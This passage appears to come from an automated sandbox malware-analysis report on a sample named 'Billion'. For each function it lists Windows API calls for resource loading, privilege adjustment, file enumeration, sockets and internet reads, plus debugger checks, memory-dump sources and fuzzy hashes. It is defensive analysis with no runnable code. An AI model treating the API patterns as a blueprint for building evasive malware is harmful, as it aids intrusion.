                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$Proc
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 929743424-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8fd8dcf83fd9854c6d7aedd3da09cd878694a9c77249bd750d7fa0163605a157
                                                                                                                                                                                                                                                                                                          • Instruction ID: fe3774b5e2841b98c5983d760cdd1a2f614b25de5105803e59f656a6ab304ca6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fd8dcf83fd9854c6d7aedd3da09cd878694a9c77249bd750d7fa0163605a157
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 508129B0108404BEE22D7A3C9C9CE7F296EFB5A300F164119F112D6696CB79CF42A276
                                                                                                                                                                                                                                                                                                          Function 001A3A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001756C2,?,?,00000000,00000000), ref: 001A3A1E
                                                                                                                                                                                                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001756C2,?,?,00000000,00000000), ref: 001A3A35
                                                                                                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,001756C2,?,?,00000000,00000000,?,?,?,?,?,?,001366CE), ref: 001A3A45
                                                                                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,001756C2,?,?,00000000,00000000,?,?,?,?,?,?,001366CE), ref: 001A3A56
                                                                                                                                                                                                                                                                                                          • LockResource.KERNEL32(001756C2,?,?,001756C2,?,?,00000000,00000000,?,?,?,?,?,?,001366CE,?), ref: 001A3A65
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                                          • Opcode ID: 569582b76698e9cf7de8bc505e8d1a0747337c9dbded284a14447dc14e6f218e
                                                                                                                                                                                                                                                                                                          • Instruction ID: c3fff54db20538a8acfa5c8204e1b6e98411637efef1923c4ec7f463ef09705d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 569582b76698e9cf7de8bc505e8d1a0747337c9dbded284a14447dc14e6f218e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11117574200701BFE7228B25EC48F27BBBDEBC6B40F24426CB412D76A0DB71E9008A20
                                                                                                                                                                                                                                                                                                          Function 001920AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00191916
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00191922
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00191931
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00191938
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0019194E
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00191C81), ref: 001920FB
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00192107
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0019210E
                                                                                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00192127
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00191C81), ref: 0019213B
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00192142
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 398712ba775b5e83415d2146d725e6ca71a82eef14357c2c34b9a1857b950c27
                                                                                                                                                                                                                                                                                                          • Instruction ID: d47352ae73898cf9fe846e269d75490601b8add93a9b150ad7bed321d17f6c69
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 398712ba775b5e83415d2146d725e6ca71a82eef14357c2c34b9a1857b950c27
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B11AC72500205FFDF149B64DC09FAE7BA9EF44355F194028F94197120C735A990CB60
                                                                                                                                                                                                                                                                                                          Function 001AA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 001AA5BD
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001AA6D0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A42B9: GetInputState.USER32 ref: 001A4310
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001A43AB
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001AA5ED
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001AA6BA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                                                                                          • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                                          • Opcode ID: 142783b7ffc84989272165a57fcf17eef195a49c67b777aeb05d78c54b3fbec5
                                                                                                                                                                                                                                                                                                          • Instruction ID: f5386034c0ae5d30111dbcbe7b5d6f1a3f26ad5551af1a016aedf3acd37962e3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 142783b7ffc84989272165a57fcf17eef195a49c67b777aeb05d78c54b3fbec5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5541837590020AAFCF15DFA4C849EEEBBB4EF16310F54405AE809A2191EB309E84CF61
                                                                                                                                                                                                                                                                                                          Function 001B2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001B3AD7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3AAB: _wcslen.LIBCMT ref: 001B3AF8
                                                                                                                                                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001B22BA
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B22E1
                                                                                                                                                                                                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 001B2338
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B2343
                                                                                                                                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 001B2372
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a0a22a04dd7d784eff371e04213ef7291c3d47955a9c0bc59b5e185c2bfbd2f2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7bb1c4f0a81528d9c4f5ac2ad51e6cc5b6c9985c3d1f06ab22e9646fd34db335
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0a22a04dd7d784eff371e04213ef7291c3d47955a9c0bc59b5e185c2bfbd2f2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4551B3B1A00200AFE710AF24C886F6A77E5AB58754F54809CF9459F3D3C775ED418BA1
                                                                                                                                                                                                                                                                                                          Function 001C26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2be523c65a070434cb276a6101b9fb42f86b2d5b698c717e11593531333dbe72
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4099a2705a1ea2df61d039f2befa16724ffa3c73caca4c4f028c04c302634835
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2be523c65a070434cb276a6101b9fb42f86b2d5b698c717e11593531333dbe72
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD21F1357003108FE7159F26D884F5A7BE5EFB5324F19806CE84A8B252DB71EC42CBA0
                                                                                                                                                                                                                                                                                                          Function 001AD889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 001AD8CE
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 001AD92F
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 001AD943
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ab00d3aec0beaf452af676b03ad4da99bd5a3829915ef091ba7a481169e3b4bf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 34c068f5c00ad4c226b1205c7b87a6a30903db3c2d6bd0ba8e4a90613fa3506f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab00d3aec0beaf452af676b03ad4da99bd5a3829915ef091ba7a481169e3b4bf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9621A1B5900B05EFE7209F65E848BAB77FCEF42318F10442EE65792942D774EA45CB50
                                                                                                                                                                                                                                                                                                          Function 0019E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,001746AC), ref: 0019E482
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0019E491
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0019E4A2
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0019E4AE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 92571c85bc663e5a0825fc971b23c12b75b53a53920d5f0ef01e6b1de4457ecd
                                                                                                                                                                                                                                                                                                          • Instruction ID: e077452120021e47e31b4caef0ebe8a9c0d9ca3142e0158bd30ac37d1fd347f0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92571c85bc663e5a0825fc971b23c12b75b53a53920d5f0ef01e6b1de4457ecd
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0A030410910679A10A738FC0D8AE7AAEAF02335B544715F836C24E0DB78E9958695
                                                                                                                                                                                                                                                                                                          Function 0018E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                                                                                                                                                          • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                                          • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3d30841f56b0c693ebf931f197f44e5546476e1939772f141d9fce1dbc61518a
                                                                                                                                                                                                                                                                                                          • Instruction ID: ec631b6cad50b4abb7ff54ec5ae0e1bc703d005e0d9a278ede2c21efb74147aa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d30841f56b0c693ebf931f197f44e5546476e1939772f141d9fce1dbc61518a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7D012B1C08118D6CB88A6909C88CB973FCBB28300F764466F906E1010F730DA449F21
                                                                                                                                                                                                                                                                                                          Function 00162992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00162A8A
                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00162A94
                                                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00162AA1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 58ae49428467e03cb21424e939204b5e00041ac02602598df7c8a1deddb33232
                                                                                                                                                                                                                                                                                                          • Instruction ID: 511bf0dd486bcb612ea420695522b044c2e931df287292dcba9c8e455444a339
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58ae49428467e03cb21424e939204b5e00041ac02602598df7c8a1deddb33232
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E31C6759012289BCB21DF64DD88799BBB4AF18311F5041EAE81CA7250E7709F858F45
                                                                                                                                                                                                                                                                                                          Function 00192010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015014B: __CxxThrowException@8.LIBVCRUNTIME ref: 001509D8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015014B: __CxxThrowException@8.LIBVCRUNTIME ref: 001509F5
                                                                                                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0019205A
                                                                                                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00192087
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00192097
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2281a9c3764a5e96535e203780ebdd924de5a0aca3a79ebcdcdbbc90010d273d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8de01399abe03fc7fa835e2f4cb766f57c14f9eec75aab818d0aded788066427
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2281a9c3764a5e96535e203780ebdd924de5a0aca3a79ebcdcdbbc90010d273d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED119DB1400604BFD7189F54ECC6D6BBBA8EB08710B24842EF45656251EB71EC41CA20
                                                                                                                                                                                                                                                                                                          Function 00155058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0015502E,?,001F98D8,0000000C,00155185,?,00000002,00000000), ref: 00155079
                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0015502E,?,001F98D8,0000000C,00155185,?,00000002,00000000), ref: 00155080
                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00155092
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
